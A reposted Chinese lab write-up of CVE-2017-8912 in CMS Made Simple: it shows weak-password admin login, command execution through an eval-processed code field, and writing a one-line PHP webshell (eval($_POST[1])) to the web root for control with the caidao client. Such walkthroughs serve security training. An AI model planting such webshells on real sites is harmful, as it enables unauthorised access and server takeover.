CVE-2017-8912 CMS Made Simple命令执行

CVE-2017-8912 CMS Made Simple命令执行

1)了解命令执行漏洞,并且能够从源码中发现。

2)用eval处理函数,并且过滤不严导致命令执行。

实验步骤

1.1)登录网站1221970-20180506225857331-710958675.jpg

1.2)进入admin后台弱口令登入1221970-20180506225911216-455507640.jpg

1.3)找到能够添加的地址![1.3)1221970-20180506225919205-76655562.jpg

1.4)点击submit提交后 点击设置项

1221970-20180506225928618-1991257538.jpg

1.5)点击run后可以看到命令被执行当前中间件的权限是system

1221970-20180506225937415-757892798.jpg

1.6)更改code区域测试是否回显

在code区域填写[system ('net user')]查看当前用户,第一次还是出现whoami的结果,关掉后再提交一次,发现并没有回显,此时并不清楚命令是否执行是否成功,在分别测试【ipconfig,systeminfo,ping 127.0.0.1,dir 】等命令后均没有回显,猜测后端过滤了一些东西
1221970-20180506230002029-299780493.jpg

1.7)测试发现php函数能够成功执行1221970-20180506230016766-444836189.jpg

1.8)PHP函数可以执行,那就利用phpinfo();执行两次后,查看当前网站的绝对路径,执行可以看到phpinfo页面,可以获得网站根路径为【c:/phpStudy/WWW】1221970-20180506230031973-27448561.jpg

1.9)利用php的【file_put_contents()】来写入一句话。在code区域写入【file_put_contents('c://phpStudy//WWW//1.php' ,' <?php eval($_POST[1]);?>' ,FILE_APPEND);】1221970-20180506230140233-611037974.jpg

提交两次成功写入一句话木马
1221970-20180506230158357-1918763228.jpg

1.11)使用caidao写入配置进行链接1221970-20180506230206824-1099573491.jpg

1.12)使用caidao进行虚拟终端1221970-20180506230215182-1664877133.jpg

1.13)成功获取到目录1221970-20180506230223483-1859073349.jpg

转载于:https://www.cnblogs.com/whatiwhere/p/9000239.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值